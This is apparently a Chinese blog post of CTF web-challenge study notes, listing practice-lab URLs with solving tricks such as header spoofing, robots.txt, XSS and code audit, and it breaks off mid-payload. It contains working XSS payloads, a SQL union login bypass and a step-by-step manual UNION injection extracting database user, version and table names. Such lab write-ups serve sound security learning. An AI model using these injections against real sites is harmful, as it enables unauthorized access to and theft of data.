本文連結:http://blog.csdn.net/u012763794/article/details/50959166
本文根據自己的做題經驗及各大練習平台不斷更新,若我最近懶了,沒怎麼更新,請在下面提醒我或鼓勵我
僅作為自己的筆記及剛入門的童鞋,大牛勿噴 基礎篇
1.直接查看原始碼
http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php
2.修改或添加HTTP要求標頭
常見的有: Referer來源偽造
X-Forwarded-For:ip偽造 User-Agent:使用者代理程式(就是用什麼瀏覽器什麼的)
http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php
//.net的版本修改,後面添加,如版本9 .NET CLR 9
Accept-Language:語言
http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php
http://ctf1.shiyanbar.com/basic/header/
Cookie的修改
http://lab1.xseclab.com/base9_ab629d778e3a29540dfd60f2e548a5eb/index.php
3.查看HTTP要求標頭或回應標頭
http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php
http://ctf1.shiyanbar.com/basic/catch/
4.302跳轉的中轉網頁有資訊 http://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/index.php
5.查看開發人員工具控制台
6.javascript代碼繞過
通過刪除或修改代碼或者本地代理改包繞過 http://lab1.xseclab.com/base10_0b4e4866096913ac9c3a2272dde27215/index.php
7.使用burp的repeater查看整個HTTP包 http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php
8.閱讀javascript代碼,直接控制台擷取正確密碼 http://ctf1.shiyanbar.com/basic/js/index.asp
9.robots.txt檔案擷取資訊 這本來是給搜尋引擎看的資訊,很可能暴露網站結構目錄 http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b/index.php
10..bash_history,這個應該說看到過吧,就是記錄使用者輸入過的linux命令的
前端指令碼類
js加解密 http://ctf5.shiyanbar.com/DUTCTF/1.html //直接在F12控制台粘貼就有了
XSS http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
這題題目就有漏洞,直接在命令列輸入下面的就有了 [javascript] view plain copy $.post("./getkey.php?ok=1",{'url':location.href,'ok':ok},function(data){ console.log(data); }); showkey(); 當然簡單的直接輸入 [javascript] view plain copy <script>alert(HackingLab)</script> 這樣也可以
這題也差不多
http://lab1.xseclab.com/realxss2_bcedaba7e8618cdfb51178765060fc7d/index.php
可以直接輸入上題的那個jquery,也可以乖乖下面的 [html] view plain copy <img src="11" onerror=alert(HackingLab)>
http://lab1.xseclab.com/realxss3_9b28b0ff93d0b0099f5ac7f8bad3f368/index.php
後端指令碼類
代碼審計 asp代碼審計: 1.http://ctf8.shiyanbar.com/aspaudit/ 長度限制:F12刪maxlength,或者改長度,本地代理都可以繞過 //Username: 'union select 1,1,1 from bdmin ' ,為什麼是三列呢,一般表中都會設定id,加上帳號密碼就3個了,不行就猜4列咯...,因為union的之前的使用者名稱為空白,所以前面的結果集為空白,所以最後的結果集只有我們後面的1,1,1了,所以在密碼那輸入1就是密碼。
這樣也行,反正就閉合標籤 'union select 1,1,1 from bdmin where '1'='1
php代碼審計 1.http://ctf8.shiyanbar.com/phpaudit/ //其實這個就是修改http要求標頭的X-Forwarded-For 2.http://ctf1.shiyanbar.com/web/4/index.php //跟下面的後台登陸型第一個一樣,請看下面的後台登陸型第一個
3.http://ctf5.shiyanbar.com/DUTCTF/index.php //二次urlencode
4.http://ctf1.shiyanbar.com/web/5/index.php //請看後台登陸型第二個
5.http://ctf4.shiyanbar.com/web/false.php //數組的雜湊值,都是null 6.http://ctf4.shiyanbar.com/web/Session.php //只需要在 第一次提交的時候直接提交password=即可,因為第一次訪問時伺服器那邊也沒設定對應的$_SESSION['password'],由於是==比較,兩者是相等的。
表單隱藏 http://ctf10.shiyanbar.com:8888/main.php
sql注入 簡單的直接上工具就ko了,如sqlmap,等-—— 10大sql注入工具 如下面幾個: 1.http://ctf5.shiyanbar.com:8080/9/asp.asp
2.http://ctf5.shiyanbar.com/8/index.php?id=1 當然不用and XX也是可以的,下面只是舉個例子 [php] view plain copy //手工注入過程 //判斷注入類型為and布爾型注入 http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=1 http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2 //判斷欄位數 http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%203 http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%202 //擷取資料庫基本資料(//concat_ws是字串串連函數,其中第一個參數是分隔字元,CHAR(58)是冒號,因為冒號的ASCII是58) http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,concat_ws(CHAR(58),user(),database(),version()) //擷取資料庫中的表,其中table_schema可以理解為資料庫吧(他是mysql系統資料表裡面的一個欄位,這裡我們用16進位表示,就是上一句查詢到的資料庫) http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x6d795f6462 //擷取重要表的欄位 http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,col